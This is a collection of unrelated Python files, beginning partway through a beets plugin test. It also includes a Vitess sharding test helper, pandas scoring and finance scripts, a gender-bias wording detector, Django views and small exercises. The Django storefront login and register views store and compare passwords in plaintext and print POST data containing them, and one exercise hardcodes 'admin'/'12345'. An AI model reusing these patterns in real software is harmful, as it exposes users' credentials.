return mock_genres['artist']
lastgenre.LastGenrePlugin.fetch_track_genre = mock_fetch_track_genre
lastgenre.LastGenrePlugin.fetch_album_genre = mock_fetch_album_genre
lastgenre.LastGenrePlugin.fetch_artist_genre = mock_fetch_artist_genre
self._setup_config(whitelist=False)
item = _common.item()
item.genre = mock_genres['track']
config['lastgenre'] = {'force': False}
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'keep'))
config['lastgenre'] = {'force': True, 'source': 'track'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['track'], 'track'))
config['lastgenre'] = {'source': 'album'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['album'], 'album'))
config['lastgenre'] = {'source': 'artist'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['artist'], 'artist'))
mock_genres['artist'] = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'original'))
config['lastgenre'] = {'fallback': 'rap'}
item.genre = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (config['lastgenre']['fallback'].get(),
'fallback'))
def test_sort_by_depth(self):
self._setup_config(canonical=True)
# Normal case.
tags = ('electronic', 'ambient', 'post-rock', 'downtempo')
res = self.plugin._sort_by_depth(tags)
self.assertEqual(
res, ['post-rock', 'downtempo', 'ambient', 'electronic'])
# Non-canonical tag ('chillout') present.
tags = ('electronic', 'ambient', 'chillout')
res = self.plugin._sort_by_depth(tags)
self.assertEqual(res, ['ambient', 'electronic'])
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
from gala import imio
import h5py
import numpy as np
from skimage._shared._tempfile import temporary_file
def test_cremi_roundtrip():
raw_image = np.random.randint(256, size=(5, 100, 100), dtype=np.uint8)
labels = np.random.randint(4096, size=raw_image.shape, dtype=np.uint64)
for ax in range(labels.ndim):
labels.sort(axis=ax) # try to get something vaguely contiguous. =P
with temporary_file('.hdf') as fout:
imio.write_cremi({'/volumes/raw': raw_image,
'/volumes/labels/neuron_ids': labels}, fout)
raw_in, lab_in = imio.read_cremi(fout)
f = h5py.File(fout)
stored_resolution = f['/volumes/raw'].attrs['resolution']
f.close()
np.testing.assert_equal(stored_resolution, (40, 4, 4))
np.testing.assert_equal(raw_in, raw_image)
np.testing.assert_equal(lab_in, labels) |
# Create your views here.
from django.http import HttpResponse
from django.template import Context, loader
from django.http import Http404,HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404,render
from storefront.models import Store,StoreAdmin
def home(request):
# return HttpResponse("U have been redirected to the home page - Hello World!")
if 'email' in request.session:
return render(request,'storefront/login.html')
else:
return render(request,'storefront/login.html')
def login(request):
print str(request.POST)
email = request.POST['email']
password = request.POST['password']
print type(email)
print "\n"
if(not email or not password ):
return HttpResponse("Enter the Details")
try:
userDetails = StoreAdmin.objects.get(admin_email = email)
print str(userDetails)
except StoreAdmin.DoesNotExist:
return HttpResponse("User doesnot exist")
print str(userDetails)
if userDetails.admin_password == password:
request.session['uid'] = userDetails.id
return HttpResponse("Login Successful")
return HttpResponse("Enter the Details")
def register(request):
store_name=request.POST['store_name']
store_address=request.POST['store_address']
store_phone=request.POST['store_phone']
store_website=request.POST['store_website']
store_email=request.POST['store_email']
store_hours=request.POST['store_hours']
store=Store(store_name=store_name,store_address=store_address,store_phone=store_phone,store_website=store_website,store_email=store_email,store_hours=store_hours)
store.save()
admin_email=request.POST['admin_email']
admin_password=request.POST['admin_password']
admin_storeid=store
storead=StoreAdmin(admin_email=admin_email,admin_password=admin_password,admin_storeid=admin_storeid)
storead.save()
request.session['email']=admin_email
return home(request)
def index(request):
return home(request)
|
from django.contrib import admin
# Register your models here.
from tags.models import TagTeacher, TagOpening, ViewTeacherUnique, ViewOpening, FavTeacher, FavOpening, ViewTeacherRecord, ViewTeacherNonUnique, SearchWordTeacherRecord, BlockUser
class SearchWordTeacherRecordAdmin(admin.ModelAdmin):
list_display = ['__unicode__','user','subject','level','date']
inlines = [
]
class Meta:
model = SearchWordTeacherRecord
class ViewTeacherRecordAdmin(admin.ModelAdmin):
list_display = ['__unicode__','uniquecount','nonuniquecount','msgcount','ordercount','date','updated']
inlines = [
]
class Meta:
model = ViewTeacherRecord
admin.site.register(TagTeacher)
admin.site.register(TagOpening)
admin.site.register(ViewTeacherUnique)
admin.site.register(ViewTeacherNonUnique)
admin.site.register(ViewOpening)
admin.site.register(FavTeacher)
admin.site.register(FavOpening)
admin.site.register(ViewTeacherRecord, ViewTeacherRecordAdmin)
admin.site.register(SearchWordTeacherRecord, SearchWordTeacherRecordAdmin)
admin.site.register(BlockUser)
|
#WAP to print all the even numbers upto a given number
n=input('Enter end point of even numbers :')
count=0
for i in range(0,n-1,2):
i=i+2
print i,
count=count+i
print""
print count
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains a base class and utility functions for sharding tests.
"""
import struct
import logging
from vtdb import keyrange_constants
import utils
keyspace_id_type = keyrange_constants.KIT_UINT64
use_rbr = False
use_multi_split_diff = False
pack_keyspace_id = struct.Struct('!Q').pack
# fixed_parent_id is used as fixed value for the "parent_id" column in all rows.
# All tests assume a multi-column primary key (parent_id, id) but only adjust
# the "id" column and use this fixed value for "parent_id".
# Since parent_id is fixed, not all test code has to include parent_id in a
# WHERE clause (at the price of a full table scan).
fixed_parent_id = 86
class BaseShardingTest(object):
"""This base class uses unittest.TestCase methods to check various things.
All sharding tests should inherit from this base class, and use the
methods as needed.
"""
# _insert_value inserts a value in the MySQL database along with the comments
# required for routing.
# NOTE: We assume that the column name for the keyspace_id is called
# 'custom_ksid_col'. This is a regression test which tests for
# places which previously hardcoded the column name to 'keyspace_id'.
def _insert_value(self, tablet_obj, table, mid, msg, keyspace_id):
k = utils.uint64_to_hex(keyspace_id)
tablet_obj.mquery(
'vt_test_keyspace',
['begin',
'insert into %s(parent_id, id, msg, custom_ksid_col) '
'values(%d, %d, "%s", 0x%x) /* vtgate:: keyspace_id:%s */ '
'/* id:%d */' %
(table, fixed_parent_id, mid, msg, keyspace_id, k, mid),
'commit'],
write=True)
def _insert_multi_value(self, tablet_obj, table, mids, msgs, keyspace_ids):
"""Generate multi-shard insert statements."""
comma_sep = ','
querystr = ('insert into %s(parent_id, id, msg, custom_ksid_col) values'
%(table))
values_str = ''
id_str = '/* id:'
ksid_str = ''
for mid, msg, keyspace_id in zip(mids, msgs, keyspace_ids):
ksid_str += utils.uint64_to_hex(keyspace_id)+comma_sep
values_str += ('(%d, %d, "%s", 0x%x)' %
(fixed_parent_id, mid, msg, keyspace_id) + comma_sep)
id_str += '%d' % (mid) + comma_sep
values_str = values_str.rstrip(comma_sep)
values_str += '/* vtgate:: keyspace_id:%s */ ' %(ksid_str.rstrip(comma_sep))
values_str += id_str.rstrip(comma_sep) + '*/'
querystr += values_str
tablet_obj.mquery(
'vt_test_keyspace',
['begin',
querystr,
'commit'],
write=True)
def _exec_non_annotated_update(self, tablet_obj, table, mids, new_val):
tablet_obj.mquery(
'vt_test_keyspace',
['begin',
'update %s set msg = "%s" where parent_id = %d and id in (%s)' %
(table, new_val, fixed_parent_id, ','.join([str(i) for i in mids])),
'commit'],
write=True)
def _exec_non_annotated_delete(self, tablet_obj, table, mids):
tablet_obj.mquery(
'vt_test_keyspace',
['begin',
'delete from %s where parent_id = %d and id in (%s)' %
(table, fixed_parent_id, ','.join([str(i) for i in mids])),
'commit'],
write=True)
def _get_value(self, tablet_obj, table, mid):
"""Returns the row(s) from the table for the provided id, using MySQL.
Args:
tablet_obj: the tablet to get data from.
table: the table to query.
mid: id field of the table.
Returns:
A tuple of results.
"""
return tablet_obj.mquery(
'vt_test_keyspace',
'select parent_id, id, msg, custom_ksid_col from %s '
'where parent_id=%d and id=%d' %
(table, fixed_parent_id, mid))
def _check_value(self, tablet_obj, table, mid, msg, keyspace_id,
should_be_here=True):
result = self._get_value(tablet_obj, table, mid)
if keyspace_id_type == keyrange_constants.KIT_BYTES:
fmt = '%s'
keyspace_id = pack_keyspace_id(keyspace_id)
else:
fmt = '%x'
if should_be_here:
self.assertEqual(result, ((fixed_parent_id, mid, msg, keyspace_id),),
('Bad row in tablet %s for id=%d, custom_ksid_col=' +
fmt + ', row=%s') % (tablet_obj.tablet_alias, mid,
keyspace_id, str(result)))
else:
self.assertEqual(
len(result), 0,
('Extra row in tablet %s for id=%d, custom_ksid_col=' +
fmt + ': %s') % (tablet_obj.tablet_alias, mid, keyspace_id,
str(result)))
def _is_value_present_and_correct(
self, tablet_obj, table, mid, msg, keyspace_id):
"""_is_value_present_and_correct tries to read a value.
Args:
tablet_obj: the tablet to get data from.
table: the table to query.
mid: the id of the row to query.
msg: expected value of the msg column in the row.
keyspace_id: expected value of the keyspace_id column in the row.
Returns:
True if the value (row) is there and correct.
False if the value is not there.
If the value is not correct, the method will call self.fail.
"""
result = self._get_value(tablet_obj, table, mid)
if not result:
return False
if keyspace_id_type == keyrange_constants.KIT_BYTES:
fmt = '%s'
keyspace_id = pack_keyspace_id(keyspace_id)
else:
fmt = '%x'
self.assertEqual(result, ((fixed_parent_id, mid, msg, keyspace_id),),
('Bad row in tablet %s for id=%d, '
'custom_ksid_col=' + fmt) % (
tablet_obj.tablet_alias, mid, keyspace_id))
return True
def check_binlog_player_vars(self, tablet_obj, source_shards,
seconds_behind_master_max=0):
"""Checks the binlog player variables are correctly exported.
Args:
tablet_obj: the tablet to check.
source_shards: the shards to check we are replicating from.
seconds_behind_master_max: if non-zero, the lag should be smaller than
this value.
"""
v = utils.get_vars(tablet_obj.port)
self.assertIn('VReplicationStreamCount', v)
self.assertEquals(v['VReplicationStreamCount'], len(source_shards))
self.assertIn('VReplicationSecondsBehindMasterMax', v)
self.assertIn('VReplicationSecondsBehindMaster', v)
self.assertIn('VReplicationSource', v)
shards = v['VReplicationSource'].values()
self.assertEquals(sorted(shards), sorted(source_shards))
self.assertIn('VReplicationSourceTablet', v)
for uid in v['VReplicationSource']:
self.assertIn(uid, v['VReplicationSourceTablet'])
if seconds_behind_master_max != 0:
self.assertTrue(
v['VReplicationSecondsBehindMasterMax'] <
seconds_behind_master_max,
'VReplicationSecondsBehindMasterMax is too high: %d > %d' % (
v['VReplicationSecondsBehindMasterMax'],
seconds_behind_master_max))
for uid in v['VReplicationSource']:
self.assertTrue(
v['VReplicationSecondsBehindMaster'][uid] <
seconds_behind_master_max,
'VReplicationSecondsBehindMaster is too high: %d > %d' % (
v['VReplicationSecondsBehindMaster'][uid],
seconds_behind_master_max))
def check_binlog_server_vars(self, tablet_obj, horizontal=True,
min_statements=0, min_transactions=0):
"""Checks the binlog server variables are correctly exported.
Args:
tablet_obj: the tablet to check.
horizontal: true if horizontal split, false for vertical split.
min_statements: check the statement count is greater or equal to this.
min_transactions: check the transaction count is greater or equal to this.
"""
v = utils.get_vars(tablet_obj.port)
if horizontal:
skey = 'UpdateStreamKeyRangeStatements'
tkey = 'UpdateStreamKeyRangeTransactions'
else:
skey = 'UpdateStreamTablesStatements'
tkey = 'UpdateStreamTablesTransactions'
self.assertIn(skey, v)
self.assertIn(tkey, v)
if min_statements > 0:
self.assertTrue(v[skey] >= min_statements,
'only got %d < %d statements' % (v[skey], min_statements))
if min_transactions > 0:
self.assertTrue(v[tkey] >= min_transactions,
'only got %d < %d transactions' % (v[tkey],
min_transactions))
def check_stream_health_equals_binlog_player_vars(self, tablet_obj, count):
"""Checks the variables exported by streaming health check match vars.
Args:
tablet_obj: the tablet to check.
count: number of binlog players to expect.
"""
blp_stats = utils.get_vars(tablet_obj.port)
self.assertEqual(blp_stats['VReplicationStreamCount'], count)
# Enforce health check because it's not running by default as
# tablets may not be started with it, or may not run it in time.
utils.run_vtctl(['RunHealthCheck', tablet_obj.tablet_alias])
stream_health = utils.run_vtctl_json(['VtTabletStreamHealth',
'-count', '1',
tablet_obj.tablet_alias])
logging.debug('Got health: %s', str(stream_health))
self.assertNotIn('serving', stream_health)
self.assertIn('realtime_stats', stream_health)
self.assertNotIn('health_error', stream_health['realtime_stats'])
self.assertIn('binlog_players_count', stream_health['realtime_stats'])
self.assertEqual(blp_stats['VReplicationStreamCount'],
stream_health['realtime_stats']['binlog_players_count'])
self.assertEqual(blp_stats['VReplicationSecondsBehindMasterMax'],
stream_health['realtime_stats'].get(
'seconds_behind_master_filtered_replication', 0))
def check_destination_master(self, tablet_obj, source_shards):
"""Performs multiple checks on a destination master.
Combines the following:
- wait_for_binlog_player_count
- check_binlog_player_vars
- check_stream_health_equals_binlog_player_vars
Args:
tablet_obj: the tablet to check.
source_shards: the shards to check we are replicating from.
"""
tablet_obj.wait_for_binlog_player_count(len(source_shards))
self.check_binlog_player_vars(tablet_obj, source_shards)
self.check_stream_health_equals_binlog_player_vars(tablet_obj,
len(source_shards))
def check_running_binlog_player(self, tablet_obj, query, transaction,
extra_text=None):
"""Checks binlog player is running and showing in status.
Args:
tablet_obj: the tablet to check.
query: number of expected queries.
transaction: number of expected transactions.
extra_text: if present, look for it in status too.
"""
status = tablet_obj.get_status()
self.assertIn('VReplication state: Open', status)
self.assertIn(
'<td><b>All</b>: %d<br><b>Query</b>: %d<br>'
'<b>Transaction</b>: %d<br></td>' % (query+transaction, query,
transaction), status)
self.assertIn('</html>', status)
if extra_text:
self.assertIn(extra_text, status)
def check_no_binlog_player(self, tablet_obj):
"""Checks no binlog player is running.
Also checks the tablet is not showing any binlog player in its status page.
Args:
tablet_obj: the tablet to check.
"""
tablet_obj.wait_for_binlog_player_count(0)
def check_throttler_service(self, throttler_server, names, rate):
"""Checks that the throttler responds to RPC requests.
We assume it was enabled by SplitClone with the flag --max_tps 9999.
Args:
throttler_server: vtworker or vttablet RPC endpoint. Format: host:port
names: Names of the throttlers e.g. BinlogPlayer/0 or <keyspace>/<shard>.
rate: Expected initial rate the throttler was started with.
"""
self.check_throttler_service_maxrates(throttler_server, names, rate)
self.check_throttler_service_configuration(throttler_server, names)
def check_throttler_service_maxrates(self, throttler_server, names, rate):
"""Checks the vtctl ThrottlerMaxRates and ThrottlerSetRate commands."""
# Avoid flakes by waiting for all throttlers. (Necessary because filtered
# replication on vttablet will register the throttler asynchronously.)
timeout_s = 10
while True:
stdout, _ = utils.run_vtctl(['ThrottlerMaxRates', '--server',
throttler_server], auto_log=True,
trap_output=True)
if '%d active throttler(s)' % len(names) in stdout:
break
timeout_s = utils.wait_step('all throttlers registered', timeout_s)
for name in names:
self.assertIn('| %s | %d |' % (name, rate), stdout)
self.assertIn('%d active throttler(s)' % len(names), stdout)
# Check that it's possible to change the max rate on the throttler.
new_rate = 'unlimited'
stdout, _ = utils.run_vtctl(['ThrottlerSetMaxRate', '--server',
throttler_server, new_rate],
auto_log=True, trap_output=True)
self.assertIn('%d active throttler(s)' % len(names), stdout)
stdout, _ = utils.run_vtctl(['ThrottlerMaxRates', '--server',
throttler_server], auto_log=True,
trap_output=True)
for name in names:
self.assertIn('| %s | %s |' % (name, new_rate), stdout)
self.assertIn('%d active throttler(s)' % len(names), stdout)
def check_throttler_service_configuration(self, throttler_server, names):
"""Checks the vtctl (Get|Update|Reset)ThrottlerConfiguration commands."""
# Verify updating the throttler configuration.
stdout, _ = utils.run_vtctl(['UpdateThrottlerConfiguration',
'--server', throttler_server,
'--copy_zero_values',
'target_replication_lag_sec:12345 '
'max_replication_lag_sec:65789 '
'initial_rate:3 '
'max_increase:0.4 '
'emergency_decrease:0.5 '
'min_duration_between_increases_sec:6 '
'max_duration_between_increases_sec:7 '
'min_duration_between_decreases_sec:8 '
'spread_backlog_across_sec:9 '
'ignore_n_slowest_replicas:0 '
'ignore_n_slowest_rdonlys:0 '
'age_bad_rate_after_sec:12 '
'bad_rate_increase:0.13 '
'max_rate_approach_threshold: 0.9 '],
auto_log=True, trap_output=True)
self.assertIn('%d active throttler(s)' % len(names), stdout)
# Check the updated configuration.
stdout, _ = utils.run_vtctl(['GetThrottlerConfiguration',
'--server', throttler_server],
auto_log=True, trap_output=True)
for name in names:
# The max should be set and have a non-zero value.
# We test only the first field 'target_replication_lag_sec'.
self.assertIn('| %s | target_replication_lag_sec:12345 ' % (name), stdout)
# protobuf omits fields with a zero value in the text output.
self.assertNotIn('ignore_n_slowest_replicas', stdout)
self.assertIn('%d active throttler(s)' % len(names), stdout)
# Reset clears our configuration values.
stdout, _ = utils.run_vtctl(['ResetThrottlerConfiguration',
'--server', throttler_server],
auto_log=True, trap_output=True)
self.assertIn('%d active throttler(s)' % len(names), stdout)
# Check that the reset configuration no longer has our values.
stdout, _ = utils.run_vtctl(['GetThrottlerConfiguration',
'--server', throttler_server],
auto_log=True, trap_output=True)
for name in names:
# Target lag value should no longer be 12345 and be back to the default.
self.assertNotIn('target_replication_lag_sec:12345', stdout)
self.assertIn('%d active throttler(s)' % len(names), stdout)
def verify_reconciliation_counters(self, worker_port, online_or_offline,
table, inserts, updates, deletes, equal):
"""Checks that the reconciliation Counters have the expected values."""
worker_vars = utils.get_vars(worker_port)
i = worker_vars['Worker' + online_or_offline + 'InsertsCounters']
if inserts == 0:
self.assertNotIn(table, i)
else:
self.assertEqual(i[table], inserts)
u = worker_vars['Worker' + online_or_offline + 'UpdatesCounters']
if updates == 0:
self.assertNotIn(table, u)
else:
self.assertEqual(u[table], updates)
d = worker_vars['Worker' + online_or_offline + 'DeletesCounters']
if deletes == 0:
self.assertNotIn(table, d)
else:
self.assertEqual(d[table], deletes)
e = worker_vars['Worker' + online_or_offline + 'EqualRowsCounters']
if equal == 0:
self.assertNotIn(table, e)
else:
self.assertEqual(e[table], equal)
|
import argparse as arg
import pandas as pd
import numpy as np
import xlwings as xw
import os
import shutil
import time
#parser = arg.ArgumentParser()
#parser.add_argument("-g", default="total", help="machine group")
#args = parser.parse_args()
smonth = "2017.09"
stable = "行为规范表"
sfolder = smonth + "月" + stable
fnamelist = "list.name.csv"
frulelist = "list.rule.csv"
frecord = smonth + ".record.csv"
fnamesave = smonth +".summary.name.csv"
frulesave = smonth +".summary.rule.csv"
aname = pd.read_csv(fnamelist, header=None, usecols=[0, 1, 2], index_col=0, names=['No', 'name', 'A'])
t = aname.index.duplicated()
aname['duplicated'] = t
print('\n--- Name List ---')
print(aname)
t = aname[aname['duplicated'] == True]
if not t.empty:
print('--- Error ---')
print(t)
exit(0)
arule = pd.read_csv(frulelist, header=None, usecols=[0, 1, 2, 3], index_col=2, names=['group1', 'group2', 'rule', 'score'])
arule.group2.fillna(value='-', inplace=True)
arule['group3'] = arule.group1 + arule.group2
arule['total'] = 0
arule['Nos'] = 'a.'
t = arule.index.duplicated()
arule['duplicated'] = t
print('\n--- Rule List ---')
print(arule)
t = arule[arule['duplicated'] == True]
if not t.empty:
print('--- Error ---')
print(t)
exit(0)
arecord = pd.read_csv(frecord, header=None, usecols=[0, 1, 2], names=['date', 'rule', 'No'])
print('\n--- Record List ---')
print(arecord)
t1 = arecord.values
t2 = []
#print(type(t1))
for i in t1:
t3 = i[2].split('.')
#print(type(t3))
#print(t3)
t3 = t3[1:]
#print(t3)
for j in t3:
t2.append([j, i[1], i[0], 0])
#print(t2)
t4 = np.array(t2)
#print(t4.dtype)
brecord = pd.DataFrame(t4, columns=['No', 'rule', 'date', '0'])
print('\n--- Record Detail List ---')
print(brecord)
flag = False
t1 = brecord.groupby(['No']).count()
#print(t1.index)
t2 = t1.index.values.astype(int)
t3 = aname.index.values
t4 = list(set(t2) - (set(t3)))
if t4:
flag = True
print('--- Error ---')
print('--- invalid No ---')
print(t4)
for i in t4:
print(brecord[brecord['No'].astype(int) == i])
t1 = brecord.groupby(['rule']).count()
t2 = t1.index.values
t3 = arule.index.values
t4 = list(set(t2) - (set(t3)))
if t4:
flag = True
print('--- Error ---')
print('--- invalid rule ---')
print(t4)
for i in t4:
print(brecord[brecord['rule'] == i])
t1 = brecord.groupby(['No', 'rule', 'date']).count()
t2 = t1[t1['0'] > 1]
if not t2.empty:
flag = True
print('--- Error ---')
print('--- repeat record ---')
print(t2)
if flag:
exit(0)
t1 = arule.groupby(['group1']).count()
t2 = t1.index.values
for i in t2:
aname[i] = 0
aname['total'] = 100
aname['comment'] = '差'
t1 = arule.groupby(['group3']).count()
t2 = t1.index.values
for i in t2:
aname[i] = ''
#print(aname)
for iNo in aname.index:
t1 = brecord[brecord.No.astype(int) == iNo]
tx = t1.groupby('rule').count().index.values
for iRule in tx:
t2 = t1[t1.rule == iRule]
t3 = t2.date.values
t4 = arule[arule.index == iRule]
tgroup1 = t4['group1'].values[0]
tgroup3 = t4['group3'].values[0]
tscore = t4['score'].values[0]
t5 = aname[aname.index == iNo]
tnoA = t5['A'].values[0]
#print(tgroup1, tgroup3, tscore, tnoA, iNo, iRule)
i = 1
if(tscore < 0 and tnoA == 'A'):
i = 2
i1 = 0
s1 = ''
for i2 in t3:
i1 = i1 + tscore*i
s1 = s1 + i2 + ' '
#print(i1, s1)
aname.loc[iNo, tgroup1] = aname.loc[iNo, tgroup1] + i1
aname.loc[iNo, 'total'] = aname.loc[iNo, 'total'] + i1
aname.loc[iNo, tgroup3] = aname.loc[iNo, tgroup3] + iRule + '(' + s1 + ') '
arule.loc[iRule, 'total'] = arule.loc[iRule, 'total'] + 1
ss = str(iNo)
arule.loc[iRule, 'Nos'] = arule.loc[iRule, 'Nos'] + ss + '.'
t1 = aname['total'].values
t2 = []
for i1 in t1:
if i1 >= 90:
i2 = 'A(优)'
elif i1 >= 85:
i2 = 'B(良)'
elif i1 >= 80:
i2 = 'C(中)'
else:
i2 = 'D(差)'
t2.append(i2)
aname['comment'] = t2
print(aname)
print(arule)
aname.to_csv(fnamesave)
arule.to_csv(frulesave)
shutil.rmtree(sfolder, ignore_errors=True)
os.mkdir(sfolder)
for iNo in aname.index:
s1 = '{:02d}'.format(iNo)
t1 = sfolder + "(" + s1 + ").xlsx"
t2 = sfolder + r"/" + t1
t3 = r"规范表模板/小白.xlsx"
shutil.copyfile(t3, t2)
wb = xw.Book(t2)
app = xw.apps.active
sheet1 = wb.sheets['Sheet1']
sheet1.range('B5').value = sfolder
sheet1.range('B6').value = 'No.' + s1
sheet1.range('D7').value = aname.loc[iNo, 'name']
sheet1.range('F7').value = aname.loc[iNo, 'total']
sheet1.range('H7').value = aname.loc[iNo, 'comment']
tx = arule.groupby('group3').count().index.values
i = 8
for j in tx:
k = 'D' + str(i)
sheet1.range(k).value = aname.loc[iNo, j]
i = i + 1
wb.save()
#wb.close()
xw.App.quit(app)
#time.sleep(1)
i = 0
while(True):
i = i + 1
appx = xw.apps
k = True
for j in appx:
if( j == app):
k = False
if(k):
s2 = '{:9d}'.format(i)
print("--- ", s1, " ---", s2, app, " ", xw.apps.count, xw.apps)
break
|
import os
import pickle
import numpy as np
import pandas as pd
from functools import reduce
import config as cfg
import utils
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-spy", type=str, help="Path to the raw SPY data file", required=True)
parser.add_argument("-dia", type=str, help="Path to the raw DIA data file", required=True)
parser.add_argument("-qqq", type=str, help="Path to the raw QQQ data file", required=True)
args = parser.parse_args()
def load_and_merge(spy_path, dia_path, qqq_path):
spy_df = pd.read_csv(args.spy).drop(columns=['Open','High','Low','Close','Volume'])
dia_df = pd.read_csv(args.dia).drop(columns=['Open','High','Low','Close','Volume'])
qqq_df = pd.read_csv(args.qqq).drop(columns=['Open','High','Low','Close','Volume'])
spy_df.columns=spy_df.columns.map(lambda x : x+'_spy' if x !='Date' else x)
dia_df.columns=dia_df.columns.map(lambda x : x+'_dia' if x !='Date' else x)
qqq_df.columns=qqq_df.columns.map(lambda x : x+'_qqq' if x !='Date' else x)
dfs = [dia_df, qqq_df, spy_df]
df = reduce(lambda left,right: pd.merge(left,right,on='Date'), dfs)
return df
def load(spy_path, dia_path, qqq_path):
spy_df = pd.read_csv(args.spy).drop(columns=['Open','High','Low','Close','Volume'])
dia_df = pd.read_csv(args.dia).drop(columns=['Open','High','Low','Close','Volume'])
qqq_df = pd.read_csv(args.qqq).drop(columns=['Open','High','Low','Close','Volume'])
return spy_df, dia_df, qqq_df
def compute_return(df):
df['Return'] = np.log(df['Adj Close']) - np.log(df['Adj Close'].shift(periods=1))
return df
def train_val_test_split(df):
# set date column as index
df['Date'] = pd.to_datetime(df['Date'])
df.set_index('Date', inplace=True)
# keeping only the correct date 03/01/2011 to 13/04/2015
Total_df = df.loc[(cfg.TRAIN_START_DATE <= df.index) & (df.index <= cfg.TEST_STOP_DATE)]
Training_df = df.loc[(cfg.TRAIN_START_DATE <= df.index) & (df.index <= cfg.TRAIN_STOP_DATE)]
Test_df = df.loc[(cfg.VAL_START_DATE <= df.index) & (df.index <= cfg.VAL_STOP_DATE)]
Out_of_sample_df = df.loc[(cfg.TEST_START_DATE <= df.index) & (df.index <= cfg.TEST_STOP_DATE)]
return Total_df, Training_df, Test_df, Out_of_sample_df
def format_datasets(spydf, diadf, qqqdf):
for n in ["MLP", "RNN", "PSN"]:
tmp_spydf = spydf.copy()
tmp_diadf = diadf.copy()
tmp_qqqdf = qqqdf.copy()
for i in cfg.SPYfeatures[n]:
tmp_spydf['Return_'+str(i)] = tmp_spydf.Return.shift(i)
for i in cfg.DIAfeatures[n]:
tmp_diadf['Return_'+str(i)] = tmp_diadf.Return.shift(i)
for i in cfg.QQQfeatures[n]:
tmp_qqqdf['Return_'+str(i)] = tmp_qqqdf.Return.shift(i)
tmp_spydf['Target'] = tmp_spydf.Return
tmp_diadf['Target'] = tmp_diadf.Return
tmp_qqqdf['Target'] = tmp_qqqdf.Return
SPY_Total_df, SPY_Training_df, SPY_Test_df, SPY_Out_of_sample_df = train_val_test_split(tmp_spydf)
DIA_Total_df, DIA_Training_df, DIA_Test_df, DIA_Out_of_sample_df = train_val_test_split(tmp_diadf)
QQQ_Total_df, QQQ_Training_df, QQQ_Test_df, QQQ_Out_of_sample_df = train_val_test_split(tmp_qqqdf)
os.makedirs(os.path.join("data", "SPY", n), exist_ok=True)
os.makedirs(os.path.join("data", "DIA", n), exist_ok=True)
os.makedirs(os.path.join("data", "QQQ", n), exist_ok=True)
utils.save_file(SPY_Training_df, os.path.join("data", "SPY", n, "Train.pkl"))
utils.save_file(SPY_Test_df, os.path.join("data", "SPY", n, "Valid.pkl"))
utils.save_file(SPY_Out_of_sample_df, os.path.join("data", "SPY", n, "Test.pkl"))
utils.save_file(DIA_Training_df, os.path.join("data", "DIA", n, "Train.pkl"))
utils.save_file(DIA_Test_df, os.path.join("data", "DIA", n, "Valid.pkl"))
utils.save_file(DIA_Out_of_sample_df, os.path.join("data", "DIA", n, "Test.pkl"))
utils.save_file(QQQ_Training_df, os.path.join("data", "QQQ", n, "Train.pkl"))
utils.save_file(QQQ_Test_df, os.path.join("data", "QQQ", n, "Valid.pkl"))
utils.save_file(QQQ_Out_of_sample_df, os.path.join("data", "QQQ", n, "Test.pkl"))
if __name__ == "__main__":
spydf, diadf, qqqdf = load(args.spy, args.dia, args.qqq)
spydf = compute_return(spydf)
diadf = compute_return(diadf)
qqqdf = compute_return(qqqdf)
# Create and Save Datasets
format_datasets(spydf, diadf, qqqdf) |
VERSION = (1, 3, 1)
from .decorators import job
from .queues import enqueue, get_connection, get_queue, get_scheduler
from .workers import get_worker
|
# -*- coding: utf-8 -*-
from functools import reduce
def str2float(s):
def fn(x, y):
return x * 10 + y
n = s.index('.') #区分字符串'.'的位置
s1 = map(int, s[:n])
s2 = map(int, s[n+1:]) #小数点前后分别处理
no = 0.1**len(s[n+1:]) #小数位
return reduce(fn, s1) + reduce(fn, s2) * no
print('str2float(\'123.456\') =', str2float('123.456'))
|
"""
Check for statements that pertain to personal, rather than profession, life.
Letters for women are more likely to discuss personal life.
Goal: Develop code that can read text for terms related to personal life like
family, children, etc. If the text includes personal life details; return a
summary that directs the author to review the personal life details for
relevance and consider removing them if they are not relevant to the
recommendation or evaluation.
"""
from genderbias.document import Document
from genderbias.detector import Detector, Flag, Issue, Report
PERSONAL_LIFE_TERMS = [
"child",
"children",
"family",
"girlfriend",
"maternal",
"mother",
"motherly",
"spouse",
"wife",
]
class PersonalLifeDetector(Detector):
"""
This detector checks for words that relate to personal life instead of
professional life.
Links:
https://github.com/molliem/gender-bias/issues/9
http://journals.sagepub.com/doi/pdf/10.1177/0957926503014002277
"""
def get_report(self, doc):
"""
Generate a report on the text based upon mentions of
personal-life-related words.
Arguments:
doc (Document): The document to check
Returns:
Report
"""
report = Report("Personal Life")
token_indices = doc.words_with_indices()
for word, start, stop in token_indices:
if word.lower() in PERSONAL_LIFE_TERMS:
report.add_flag(
Flag(start, stop, Issue(
"Personal Life",
"The word {word} tends to relate to personal life.".format(word=word),
"Try replacing with a sentiment about professional life."
))
)
return report
def personal_life_terms_prevalence(doc: 'Document') -> float:
"""
Returns the prevalence of tems that refer to personal life.
Returns the floating-point ratio of `personal`/`total`.
Arguments:
doc (Document): The document to check
Returns:
float: The "concentration" of personal-life terms
"""
doc_words = doc.words()
return float(sum([
word in PERSONAL_LIFE_TERMS
for word in doc_words
])) / len(doc_words)
|
#! python3
"""
Have the user enter a username and password.
Repeat this until both the username and password match the
following:
username: admin
password: 12345
(2 marks)
inputs:
str (username)
str (password)
outputs:
Access granted
Access denied
"""
username = str(input("Enter a username ")).strip()
password = str(input("Enter a password ")).strip()
while (username != "admin") or (password != "12345"):
print("Access denied")
username = str(input("Enter a username "))
password = str(input("Enter a password "))
